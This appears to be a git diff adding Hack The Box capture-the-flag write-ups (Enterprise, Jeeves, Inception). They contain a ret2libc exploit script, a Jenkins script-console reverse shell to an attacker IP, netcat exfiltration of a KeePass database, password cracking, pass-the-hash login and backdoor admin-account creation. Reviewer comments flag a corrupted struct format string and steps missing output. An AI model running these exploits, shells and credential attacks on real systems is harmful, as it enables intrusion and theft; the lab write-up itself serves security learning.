+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → ltrace ./lcars.binary
+ __libc_start_main(0x56588c91, 1, 0xffc87bc4, 0x56588d30 <****unfinished ...****>
+ setresuid(0, 0, 0, 0x56588ca8) = 0xffffffff
+ puts(""
+ ) = 1
+ puts(" _______ _______"... _______ _______ ______ _______
+ ) = 49
+ puts(" | | |_____|"... | | |_____| |_____/ |______
+ ) = 49
+ puts(" |_____ |_____ | |"... |_____ |_____ | | | \_ ______|
+ ) = 49
+ puts(""
+ ) = 1
+ puts("Welcome to the Library Computer "...Welcome to the Library Computer Access and Retrieval System
+
+ ) = 61
+ puts("Enter Bridge Access Code: "Enter Bridge Access Code:
+ ) = 27
+ fflush(0xf7f3fd80) = 0
+ fgets
+
+At this point, we have to give some user input, so let's try and see if there is a certain limit to this input to trigger a buffer overflow
+
+
+ fflush(0xf7f2ed80) = 0
+ fgets(AAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAAa
+ "AAAAAAAA", 9, 0xf7f2e5c0) = 0xffa1ec17
+ strcmp("AAAAAAAA", "picarda1") = -1
+ puts("\nInvalid Code\nTerminating Consol"...
+ Invalid Code
+ Terminating Console
+
+ ) = 35
+ fflush(0xf7f2ed80) = 0
+ exit(0 <****no return ...>
+ +++ exited (status 0) +++
+
+and we see that we managed to trigger some kind of a BOF revealling "picarda1" so let's run it within gdb :
+
+
+ λ nihilist [ 80.215.152.250 ] [~/_HTB/Enterprise]
+ → gdb ./lcars.binary
+ GNU gdb (Debian 8.3.1-1) 8.3.1
+ Copyright (C) 2019 Free Software Foundation, Inc.
+ License GPLv3+: GNU GPL version 3 or later
+ This is free software: you are free to change and redistribute it.
+ There is NO WARRANTY, to the extent permitted by law.
+ Type "show copying" and "show warranty" for details.
+ This GDB was configured as "x86_64-linux-gnu".
+ Type "show configuration" for configuration details.
+
+ For help, type "help".
+ Type "apropos word" to search for commands related to "word"...
+ Reading symbols from ./lcars.binary...
+ (No debugging symbols found in ./lcars.binary)
+ gdb-peda$ r
+ Starting program: /home/nihilist/_HTB/Enterprise/lcars.binary
+
+ _______ _______ ______ _______
+ | | |_____| |_____/ |______
+ |_____ |_____ | | | \_ ______|
+
+ Welcome to the Library Computer Access and Retrieval System
+
+ Enter Bridge Access Code:
+ picarda1
+
+ _______ _______ ______ _______
+ | | |_____| |_____/ |______
+ |_____ |_____ | | | \_ ______|
+
+ Welcome to the Library Computer Access and Retrieval System
+
+
+
+ LCARS Bridge Secondary Controls -- Main Menu:
+
+ 1. Navigation
+ 2. Ships Log
+ 3. Science
+ 4. Security
+ 5. StellaCartography
+ 6. Engineering
+ 7. Exit
+ Waiting for input:
+
+
+With the picarda1 password we gain access to some sort of a menu within the binary, choosing 4 and then typing something we arrive at something interesting :
+
+
+ 1. Navigation
+ 2. Ships Log
+ 3. Science
+ 4. Security
+ 5. StellaCartography
+ 6. Engineering
+ 7. Exit
+ Waiting for input:
+ 4
+ Disable Security Force Fields
+ Enter Security Override:
+
+ asd
+ Rerouting Tertiary EPS Junctions: asd[Inferior 1 (process 4645) exited normally]
+ Warning: not running
+
+ gdb-peda$ checksec
+ CANARY : disabled
+ FORTIFY : disabled
+ NX : disabled
+ PIE : ENABLED
+ RELRO : Partial
+
+ gdb-peda$ aslr
+ ASLR is OFF
+
+
+
+here we use checksec and see that NX and ASLR are both disabled. Back on the machine we check if ASLR is turned off as the binary says so :
+
+
+ www-data@enterprise:/bin$ cat /proc/sys/kernel/randomize_va_space
+ cat /proc/sys/kernel/randomize_va_space
+ 0
+
+
+and here it says 0 therefore ASLR is actually disabled.
+
+
+ gdb-peda$ r
+ Starting program: /home/nihilist/_HTB/Enterprise/lcars.binary
+
+ _______ _______ ______ _______
+ | | |_____| |_____/ |______
+ |_____ |_____ | | | \_ ______|
+
+ Welcome to the Library Computer Access and Retrieval System
+
+ Enter Bridge Access Code:
+ picarda1
+
+ _______ _______ ______ _______
+ | | |_____| |_____/ |______
+ |_____ |_____ | | | \_ ______|
+
+ Welcome to the Library Computer Access and Retrieval System
+
+
+
+ LCARS Bridge Secondary Controls -- Main Menu:
+
+ 1. Navigation
+ 2. Ships Log
+ 3. Science
+ 4. Security
+ 5. StellaCartography
+ 6. Engineering
+ 7. Exit
+ Waiting for input:
+ 4
+ Disable Security Force Fields
+ Enter Security Override:
+ AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6A
+
+ Program received signal SIGSEGV, Segmentation fault.
+ [----------------------------------registers-----------------------------------]
+ EAX: 0x216
+ EBX: 0x73254125 ('%A%s')
+ ECX: 0x7ffffde9
+ EDX: 0xf7fab010 --> 0x0
+ ESI: 0xf7fa9000 --> 0x1d6d6c
+ EDI: 0xf7fa9000 --> 0x1d6d6c
+ EBP: 0x41422541 ('A%BA')
+ ESP: 0xffffd140 ("nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$A"...)
+ EIP: 0x25412425 ('%$A%')
+ EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
+ [-------------------------------------code-------------------------------------]
+ Invalid $PC address: 0x25412425
+ [------------------------------------stack-------------------------------------]
+ 0000| 0xffffd140 ("nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$A"...)
+ 0004| 0xffffd144 ("A%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAs"...)
+ 0008| 0xffffd148 ("%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-"...)
+ 0012| 0xffffd14c ("DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(A"...)
+ 0016| 0xffffd150 ("A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs"...)
+ 0020| 0xffffd154 ("%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)"...)
+ 0024| 0xffffd158 ("aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEA"...)
+ 0028| 0xffffd15c ("A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs"...)
+ [------------------------------------------------------------------------------]
+ Legend: code, data, rodata, value
+ Stopped reason: SIGSEGV
+ 0x25412425 in ?? ()
+ gdb-peda$ pattern_offset 500
+ 500 not found in pattern buffer
+ gdb-peda$ pattern_offset
+ Error: missing argument
+ Search for offset of a value in cyclic pattern
+ Set "pattern" option for basic/extended pattern type
+ Usage:
+ pattern_offset value
+
+ gdb-peda$ pattern_offset %$A%
+ %$A% found at offset: 212
+
+
+
+Here we found the offset of our pattern (that was 500 chars) at 212. now we just need to find the addresses of system, +9999999 and sh in order to get our root shell using the following command within gdb : **find &system;,+9999999,"sh"** and once we're done we arrive at the following payload :
+
+
+ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x60\xc0\xe4\xf7\xf0\xfa\xe3\xf7\xd5\xdd\xf6\xf7
+
+
+Which is basically 212 As, + system's memory address, + exit + /bin/sh. Another way of doing things is using a python script used to connect remotely to the machine, and directly execute the binary with the correct payload, which effectively gives us a root shell on the machine.
+
+
+ #!/usr/bin/env python2
+ import time
+ import struct
+ from pwn import *
+ from subprocess import *
+
+ DEBUG = False
+ RHOST = "10.10.10.61"
+ RPORT = 32812
+
+ def conv(num):
+ return struct.pack("<****I",num)
+
+ payload = "A" * 212
+ payload += conv(0xf7e4c060) # system()
+ payload += conv(0xf7e3faf0) # exit()
+ payload += conv(0xf7f6ddd5) # 'sh'
+
+ r = remote(RHOST, RPORT)
+ r.recvuntil("Enter Bridge Access Code: ")
+ r.sendline("picarda1")
+ r.recvuntil("Waiting for input: ")
+ r.sendline("4")
+ r.recvuntil("Enter Security Override:")
+ r.sendline(payload)
+ r.interactive()
+
+Save it locally, and then execute it :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → ./autopwn.py
+ zsh: permission denied: ./autopwn.py
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → chmod +x autopwn.py
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Enterprise]
+ → ./autopwn.py
+ [+] Opening connection to 10.10.10.61 on port 32812: Done
+ [*] Switching to interactive mode
+
+ $ id
+ uid=0(root) gid=0(root) groups=0(root)
+ $ cat /root/root.txt
+ cfXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
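Review bot: the sentence after the `checksec` output ("we use checksec and see that NX and ASLR are both disabled") conflates two different things: `checksec` reports only the binary's own mitigations (CANARY, FORTIFY, NX, PIE, RELRO), and the `aslr` line below it reports whether gdb has turned off address-space randomisation for the debuggee, which gdb does by default, so "ASLR is OFF" there says nothing about the target host. The `cat /proc/sys/kernel/randomize_va_space` returning `0` on the box is the check that actually establishes ASLR is disabled system-wide, and it is the only reason the fixed libc addresses in the script are usable; the text should say that explicitly, since the lesson for defenders is a setuid root binary with no stack protector and no NX running on a host with ASLR switched off. Two formatting defects in the committed file: `struct.pack("<****I",num)` in `conv()` is not a valid struct format string (the same `<****` corruption appears in `<****unfinished ...****>` and `<****no return ...>`, so this looks like damaged `"<I"`), meaning the script as committed raises `struct.error` before connecting; and the stray backtick before `_Terminal 2:_` (and the lone backtick line after the credential list) leave unclosed inline code spans in the rendered markdown.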
diff --git a/Medium/15.md b/Medium/15.md
new file mode 100644
index 0000000..c222927
--- /dev/null
+++ b/Medium/15.md
@@ -0,0 +1,390 @@
+# Jeeves Writeup
+
+
+
+## Introduction :
+
+Jeeves is a medium windows box that was released back in November 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → nmap -F 10.10.10.63 --top-ports 10000
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-07 11:01 GMT
+ Nmap scan report for 10.10.10.63
+ Host is up (0.10s latency).
+ Not shown: 8316 filtered ports
+ PORT STATE SERVICE
+ 80/tcp open http
+ 135/tcp open msrpc
+ 445/tcp open microsoft-ds
+ 50000/tcp open ibm-db2
+
+ Nmap done: 1 IP address (1 host up) scanned in 27.37 seconds
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → nmap -sCV -p80,135,445,50000 10.10.10.63
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-07 11:01 GMT
+ Nmap scan report for 10.10.10.63
+ Host is up (0.11s latency).
+
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Microsoft IIS httpd 10.0
+ | http-methods:
+ |_ Potentially risky methods: TRACE
+ |_http-server-header: Microsoft-IIS/10.0
+ |_http-title: Ask Jeeves
+ 135/tcp open msrpc Microsoft Windows RPC
+ 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
+ 50000/tcp open http Jetty 9.4.z-SNAPSHOT
+ |_http-server-header: Jetty(9.4.z-SNAPSHOT)
+ |_http-title: Error 404 Not Found
+ Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Host script results:
+ |_clock-skew: mean: 4h01m38s, deviation: 0s, median: 4h01m37s
+ |_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
+ | smb-security-mode:
+ | account_used: guest
+ | authentication_level: user
+ | challenge_response: supported
+ |_ message_signing: disabled (dangerous, but default)
+ | smb2-security-mode:
+ | 2.02:
+ |_ Message signing enabled but not required
+ | smb2-time:
+ | date: 2020-03-07T15:03:42
+ |_ start_date: 2020-03-06T19:38:44
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 48.29 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+our nmap scan picked up port 80 and 50000 running the http service so let's examine it with gobuster :
+
+ 
+
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → gobuster dir -u http://10.10.10.63/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
+ ===============================================================
+ Gobuster v3.0.1
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
+ ===============================================================
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → gobuster dir -u http://10.10.10.63:50000/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
+ ===============================================================
+ Gobuster v3.0.1
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
+ ===============================================================
+ [+] Url: http://10.10.10.63:50000/
+ [+] Threads: 50
+ [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
+ [+] Status codes: 200,204,301,302,307,401,403
+ [+] User Agent: gobuster/3.0.1
+ [+] Timeout: 10s
+ ===============================================================
+ 2020/03/07 11:09:18 Starting gobuster
+ ===============================================================
+ /askjeeves (Status: 302)
+ ===============================================================
+ 2020/03/07 11:18:07 Finished
+ ===============================================================
+
+
+Gobuster didn't find many interesting apart from /askjeeves on port 50000 so let's check it out :
+
+
+
+Looking into script console we are able to get command execution :
+
+
+
+so let's try to upload a windows binary onto the machine using command execution and python's SimpleHTTPServer module :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → cd /usr/share/windows-binaries
+
+ λ nihilist [ 10.10.14.11/23 ] [/usr/share/windows-binaries]
+ → ls
+ enumplus fgdump klogger.exe nbtenum plink.exe vncviewer.exe whoami.exe
+ exe2bat.exe fport mbenum nc.exe radmin.exe wget.exe
+
+ λ nihilist [ 10.10.14.11/23 ] [/usr/share/windows-binaries]
+ → python -m SimpleHTTPServer 8080
+ Serving HTTP on 0.0.0.0 port 8080 ...
+
+
+On jenkins's script console run the following :
+
+
+ def process = "powershell -command Invoke-WebRequest 'http://10.10.14.11:8080/nc.exe' -OutFile nc.exe".execute();
+ println("${process.text}");
+
+
+Once the netcat binary is on the box, we use it to get ourselves a reverse shell :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → nc -lvnp 9001
+
+
+
+ def process = "powershell -command ./nc.exe 10.10.14.11 9001 -e cmd.exe".execute();
+ println("${process.text}");
+
+
+` 
+
+And we get a reverse shell ! now let's see what we can do from here :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → nc -lvnp 9001
+ listening on [any] 9001 ...
+ connect to [10.10.14.11] from (UNKNOWN) [10.10.10.63] 49688
+ Microsoft Windows [Version 10.0.10586]
+ (c) 2015 Microsoft Corporation. All rights reserved.
+
+ C:\Users\Administrator\.jenkins>whoami
+ whoami
+ jeeves\kohsuke
+
+ C:\Users\Administrator\.jenkins>cd ..
+ cd ..
+ Access is denied.
+
+
+Even though our reverse shell spawned us inside the administrator directory, we need to head over to our kohsuke directory
+
+
+ C:\Users\Administrator\.jenkins>cd C:\Users\kohsuke
+ cd C:\Users\kohsuke
+
+ C:\Users\kohsuke>dir
+ dir
+ Volume in drive C has no label.
+ Volume Serial Number is BE50-B1C9
+
+ Directory of C:\Users\kohsuke
+
+ 03/06/2020 11:44 PM <****DIR> .
+ 03/06/2020 11:44 PM <****DIR> ..
+ 11/03/2017 09:51 PM <****DIR> .groovy
+ 11/03/2017 10:15 PM <****DIR> Contacts
+ 11/03/2017 10:19 PM <****DIR> Desktop
+ 11/03/2017 10:18 PM <****DIR> Documents
+ 11/03/2017 10:15 PM <****DIR> Downloads
+ 03/04/2020 06:17 PM 1,230,604 epp
+ 11/03/2017 10:15 PM <****DIR> Favorites
+ 11/03/2017 10:22 PM <****DIR> Links
+ 03/06/2020 06:33 PM 136,192 ms16-032.exe
+ 11/03/2017 10:15 PM <****DIR> Music
+ 11/03/2017 10:22 PM <****DIR> OneDrive
+ 11/04/2017 02:10 AM <****DIR> Pictures
+ 11/03/2017 10:15 PM <****DIR> Saved Games
+ 11/03/2017 10:16 PM <****DIR> Searches
+ 11/03/2017 10:15 PM <****DIR> Videos
+ 2 File(s) 1,366,796 bytes
+ 15 Dir(s) 7,481,786,368 bytes free
+
+Once inside the documents folder, we see a kdbx password database, so let's send it over to our local machine:
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Jeeves]
+ → nc -lvnp 9002 > CEH.kdbx
+ listening on [any] 9002 ...
+
+
+
+ C:\Users\kohsuke\Documents>C:\Users\Administrator\.jenkins\nc.exe 10.10.14.11 9002 < CEH.kdbx
+
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Jeeves]
+ → nc -lvnp 9002 > CEH.kdbx
+ listening on [any] 9002 ...
+ connect to [10.10.14.11] from (UNKNOWN) [10.10.10.63] 49689
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Jeeves]
+ → file CEH.kdbx
+ CEH.kdbx: Keepass password database 2.x KDBX
+
+
+Now obviously we need to find the master password , to do so we can use keepass2john and rockyou.txt
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Jeeves]
+ → keepass2john CEH.kdbx
+ CEH:$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48
+
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Jeeves]
+ → keepass2john CEH.kdbx > hash.txt
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Jeeves]
+ → john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
+ Using default input encoding: UTF-8
+
+
+And we get the password moonshine1 , so let's use keepass to open it and see what the keepass database contains :
+
+ 
+
+so we'll use pth-winexe to get a shell connection to the machine using the hashed password we found :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Jeeves]
+ → nano backup.pass
+
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Jeeves]
+ → pth-winexe --user=jeeves/administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 --system //10.10.10.63 cmd.exe
+ E_md4hash wrapper called.
+ HASH PASS: Substituting user supplied NTLM HASH...
+ Microsoft Windows [Version 10.0.10586]
+ (c) 2015 Microsoft Corporation. All rights reserved.
+
+ C:\Windows\system32>whoami
+ whoami
+ nt authority\system
+
+
+And here we see that we are logged in as nt authority\system
+
+
+
+ C:\Windows\system32>systeminfo
+ systeminfo
+
+ Host Name: JEEVES
+ OS Name: Microsoft Windows 10 Pro
+ OS Version: 10.0.10586 N/A Build 10586
+ OS Manufacturer: Microsoft Corporation
+ OS Configuration: Standalone Workstation
+ OS Build Type: Multiprocessor Free
+ Registered Owner: Windows User
+ Registered Organization:
+ Product ID: 00331-20304-47406-AA297
+ Original Install Date: 10/25/2017, 4:45:33 PM
+ System Boot Time: 3/6/2020, 2:38:22 PM
+ System Manufacturer: VMware, Inc.
+ System Model: VMware7,1
+ System Type: x64-based PC
+ Processor(s): 1 Processor(s) Installed.
+ [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
+ BIOS Version: VMware, Inc. VMW71.00V.13989454.B64.1906190538, 6/19/2019
+ Windows Directory: C:\Windows
+ System Directory: C:\Windows\system32
+ Boot Device: \Device\HarddiskVolume1
+ System Locale: en-us;English (United States)
+ Input Locale: en-us;English (United States)
+ Time Zone: (UTC-05:00) Eastern Time (US & Canada)
+ Total Physical Memory: 2,047 MB
+ Available Physical Memory: 1,030 MB
+ Virtual Memory: Max Size: 2,687 MB
+ Virtual Memory: Available: 1,580 MB
+ Virtual Memory: In Use: 1,107 MB
+ Page File Location(s): C:\pagefile.sys
+ Domain: WORKGROUP
+ Logon Server: N/A
+ Hotfix(s): 10 Hotfix(s) Installed.
+ [01]: KB3150513
+ [02]: KB3161102
+ [03]: KB3172729
+ [04]: KB3173428
+ [05]: KB4021702
+ [06]: KB4022633
+ [07]: KB4033631
+ [08]: KB4035632
+ [09]: KB4051613
+ [10]: KB4041689
+ Network Card(s): 1 NIC(s) Installed.
+ [01]: Intel(R) 82574L Gigabit Network Connection
+ Connection Name: Ethernet0
+ DHCP Enabled: No
+ IP address(es)
+ [01]: 10.10.10.63
+ Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
+
+
+
+Looking at systeminfo we see that we have a hotfixes are installed, so let's try and see if we can somehow vnc into the box, but first we need to first set up the vnc connection.
+
+
+ C:\Windows\system32>net user /add nihilist jeeved
+ net user /add nihilist jeeved
+ The command completed successfully.
+
+ C:\Windows\system32>net localgroup administrators nihilist /add
+
+ C:\Windows\system32>reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
+ reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
+ The operation completed successfully.
+
+ C:\Windows\system32>netsh firewall set service remoteadmin enable
+ netsh firewall set service remoteadmin enable
+
+ IMPORTANT: Command executed successfully.
+ However, "netsh firewall" is deprecated;
+ use "netsh advfirewall firewall" instead.
+ For more information on using "netsh advfirewall firewall" commands
+ instead of "netsh firewall", see KB article 947709
+ at http://go.microsoft.com/fwlink/?linkid=121488 .
+
+ Ok.
+
+
+ C:\Windows\system32>netsh firewall set service remotedesktop enable
+ netsh firewall set service remotedesktop enable
+
+ IMPORTANT: Command executed successfully.
+ However, "netsh firewall" is deprecated;
+ use "netsh advfirewall firewall" instead.
+ For more information on using "netsh advfirewall firewall" commands
+ instead of "netsh firewall", see KB article 947709
+ at http://go.microsoft.com/fwlink/?linkid=121488 .
+
+ Ok.
+
+
+
+Here we created the user nihilist, added him to the administrator localgroup, started the rdp service, allowed RDP connections for the firewall, from there we just need to use rdesktop to connect to the account we created.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → rdesktop 10.10.10.63
+
+
+`  
+
+Once we're connected, we head over to kohsuke's desktop to copy the user flag on our desktop, to be able to print it :
+
+
+
+## **Part 3 : Getting Root Access**
+
+However, we can do the same thing to the user account ! Going in the administrator desktop and copying the only textfile on our desktop allows us to be able to read it, and we see that it's not our root flag YET, so we'll follow the advice the textfile gave us :
+
+ 
+
+And that's it ! we have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
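Review bot: two steps claim results that the quoted output does not show. "Once inside the documents folder, we see a kdbx password database" follows a `dir` of `C:\Users\kohsuke`, not of `Documents`, and `CEH.kdbx` never appears in any listing; and "we get the password moonshine1" follows a `john` run whose output stops at "Using default input encoding: UTF-8", so the cracked-password line (or a `john --show hash.txt`) is missing. Add the `dir Documents` listing and the john result so the steps are reproducible. Smaller points: the text says "vnc into the box", but `fDenyTSConnections`, `netsh firewall set service remotedesktop enable` and `rdesktop` configure RDP, not VNC; `net localgroup administrators nihilist /add` is shown without its output; "we have a hotfixes are installed" needs rewording; and the stray backticks before two image lines leave unclosed inline code spans. From a detection standpoint it is worth a sentence that this path leaves loud artefacts (a new local account added to Administrators, a Terminal Server registry change, firewall rule changes), all of which are routinely alerted on.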
diff --git a/Medium/16.md b/Medium/16.md
new file mode 100644
index 0000000..5466a00
--- /dev/null
+++ b/Medium/16.md
@@ -0,0 +1,803 @@
+# Inception Writeup
+
+
+
+## Introduction :
+
+Inception is a Medium Linux box released back in December 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → nmap -F --top-ports 10000 10.10.10.67 -v
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-08 07:55 GMT
+ Initiating Ping Scan at 07:55
+ Scanning 10.10.10.67 [2 ports]
+ Completed Ping Scan at 07:55, 0.09s elapsed (1 total hosts)
+ Initiating Parallel DNS resolution of 1 host. at 07:55
+ Completed Parallel DNS resolution of 1 host. at 07:55, 0.03s elapsed
+ Initiating Connect Scan at 07:55
+ Scanning 10.10.10.67 [8320 ports]
+ Discovered open port 80/tcp on 10.10.10.67
+ Discovered open port 3128/tcp on 10.10.10.67
+ Completed Connect Scan at 07:56, 26.46s elapsed (8320 total ports)
+ Nmap scan report for 10.10.10.67
+ Host is up (0.091s latency).
+ Not shown: 8318 filtered ports
+ PORT STATE SERVICE
+ 80/tcp open http
+ 3128/tcp open squid-http
+
+ Read data files from: /usr/bin/../share/nmap
+ Nmap done: 1 IP address (1 host up) scanned in 26.68 seconds
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
